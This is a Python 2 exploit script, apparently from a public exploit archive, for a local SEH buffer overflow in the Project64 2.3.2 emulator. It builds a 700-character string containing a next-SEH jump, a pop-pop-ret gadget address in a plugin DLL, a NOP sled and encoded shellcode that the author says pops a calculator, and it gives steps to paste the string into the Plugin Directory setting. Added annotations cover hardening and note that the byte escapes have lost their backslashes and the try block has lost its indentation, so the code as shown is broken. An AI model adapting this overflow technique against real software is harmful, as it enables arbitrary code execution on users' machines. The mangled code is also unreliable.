# Exploit Title: Project64 2.3.2 - Local BufferOverflow (SEH)
# Date: 2018-08-21
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Software Link:https://www.pj64-emu.com/download/project64-latest
# Tested Version: 2.3.2
# Tested on OS: Windows XP Service Pack 3 x86 , Windows 7 ultimate x86

# Steps to Reproduce:
# 1. Run the Python script; it creates a new file named "exploit.txt".
# 2. Just copy the text inside "exploit.txt".
# 3. Start the program. In the new window click "Options" > "Settings" > "Directories".
# 4. Now paste the content of "exploit.txt" into the field "Plugin Directory" and make sure it is selected. Click "Apply" > "Ok".
# You will see a sweet calculator pop up.
# Greetz: @hexachordanu @FuzzySec @LiveOverflow

# Builds a 700-character string and writes it to "exploit.txt"; the string is
# meant to be pasted into Project64's "Plugin Directory" setting (steps above).
#
# NOTE(review): as reproduced here the string literals contain no backslashes,
# so each "x.." pair is two plain ASCII characters rather than a byte escape;
# the byte values named in the comments are the author's intent, not what this
# copy of the script actually emits.
#
# Hardening/detection notes (from the facts on this page): the technique
# depends on the plugin DLL being built without SafeSEH/ASLR (see the gadget
# comment below) — rebuilding the plugin with those protections breaks the
# chain — and the trigger is an unusually long (700-character) value in a
# directory-path setting, which length validation on that field would reject.

junk = "A" * 380                # filler up to the exception-handler record (author's layout)
nseh = "xEBx06x90x90"           # value written over the next-SEH field
#0x10096609 : pop ebx # pop eax # ret | ascii {PAGE_EXECUTE_READWRITE} [Jabo_Direct3D8.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.7.0.57-ver5 (C:Program FilesProject64 2.3PluginGFXJabo_Direct3D8.dll)
seh = "x09x66x09x10"            # handler field; points at the gadget described on the line above
nops = "x90" * 18               # slack before the payload body
#badchar x00x0ax0dx2f
# Payload body; per the steps above it launches the calculator. Built to avoid
# the bad characters listed on the line above.
buf = ""
buf += "xbax9ax98xafx7exddxc2xd9x74x24xf4x5fx29"
buf += "xc9xb1x31x83xc7x04x31x57x0fx03x57x95x7a"
buf += "x5ax82x41xf8xa5x7bx91x9dx2cx9exa0x9dx4b"
buf += "xeax92x2dx1fxbex1exc5x4dx2bx95xabx59x5c"
buf += "x1ex01xbcx53x9fx3axfcxf2x23x41xd1xd4x1a"
buf += "x8ax24x14x5bxf7xc5x44x34x73x7bx79x31xc9"
buf += "x40xf2x09xdfxc0xe7xd9xdexe1xb9x52xb9x21"
buf += "x3bxb7xb1x6bx23xd4xfcx22xd8x2ex8axb4x08"
buf += "x7fx73x1ax75xb0x86x62xb1x76x79x11xcbx85"
buf += "x04x22x08xf4xd2xa7x8bx5ex90x10x70x5fx75"
buf += "xc6xf3x53x32x8cx5cx77xc5x41xd7x83x4ex64"
buf += "x38x02x14x43x9cx4fxcexeax85x35xa1x13xd5"
buf += "x96x1exb6x9dx3ax4axcbxffx50x8dx59x7ax16"
buf += "x8dx61x85x06xe6x50x0exc9x71x6dxc5xaex8e"
buf += "x27x44x86x06xeex1cx9bx4ax11xcbxdfx72x92"
buf += "xfex9fx80x8ax8ax9axcdx0cx66xd6x5exf9x88"
buf += "x45x5ex28xebx08xccxb0xc2xafx74x52x1b"
# Pads with "B" so the whole string is exactly 700 characters long.
pad = "B" * (700 - len(nseh) -len(seh) - len(junk) -len(nops) - len(buf))

payload = junk + nseh +seh + nops + buf + pad

exploit = payload
# Write the string to disk. Python 2 syntax (print statement). The try body
# is unindented in this copy, presumably lost in extraction. The bare except
# swallows every error (e.g. a permission error) and reports no reason; the
# file object is also not closed if write() fails — a `with open(...)` block
# and a narrower `except IOError` would be the usual fix.
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(exploit)
f.write(exploit)
f.close()
print "[+] File created!"
except:
print "File cannot be created"